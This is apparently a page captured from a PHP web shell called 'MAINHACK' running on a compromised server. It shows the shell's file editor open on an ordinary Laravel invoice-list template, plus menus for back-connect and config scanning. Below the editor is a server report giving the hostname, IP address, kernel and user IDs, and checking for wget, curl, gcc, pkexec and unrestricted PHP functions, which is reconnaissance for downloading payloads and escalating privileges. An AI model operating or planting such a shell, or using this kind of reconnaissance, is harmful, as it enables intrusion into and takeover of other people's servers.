[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ajax.blade.php
@foreach($invoices as $invoice) <!--each payment--> <div class="subscription-history" id="invoice_{{ $invoice->bill_invoiceid }}"> <div class="table-responsive"> <table class="table m-0"> <tbody> <tr class="x-item col-sm-12 col-md-2 p-t-2"> <td><i class="sl-icon-credit-card"></i> <a href="{{ url('/invoices/'.$invoice->bill_invoiceid) }}"><span>{{ $invoice->formatted_bill_invoiceid }}</span></a> </td> <td>{{ runtimeDate($invoice->bill_date) }}</td> <td>@lang('lang.stripe_payment')</td> <td>{{ runtimeMoneyFormat($invoice->bill_final_amount) }}</td> <td><span class="label label-outline-info">@lang('lang.paid')</span> </td> <td> <div class="list-table-action"> <!--delete--> @if(config('visibility.delete_button')) <button type="button" title="{{ cleanLang(__('lang.delete')) }}" class="data-toggle-action-tooltip btn btn-outline-danger btn-circle btn-sm confirm-action-danger" data-confirm-title="{{ cleanLang(__('lang.delete_invoice')) }}" data-confirm-text="{{ cleanLang(__('lang.are_you_sure')) }}" data-ajax-type="DELETE" data-url="{{ url('/') }}/invoices/{{ $invoice->bill_invoiceid }}"> <i class="sl-icon-trash"></i> </button> @endif <!--view--> <a href="/invoices/{{ $invoice->bill_invoiceid }}" title="{{ cleanLang(__('lang.view')) }}" class="subscription-invoice-button btn btn-outline-info btn-circle btn-sm"> <i class="ti-new-window"></i> </a> <!--download--> <a href="{{ url('/invoices/'.$invoice->bill_invoiceid.'/pdf') }}" download title="Dowload" class="subscription-invoice-button data-toggle-action-tooltip btn btn-outline-info btn-circle btn-sm" data-original-title="@lang('lang.download')"> <i class="ti-download"></i> </a> </div> </td> </tr> <tbody> </table> </div> </div> @endforeach
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002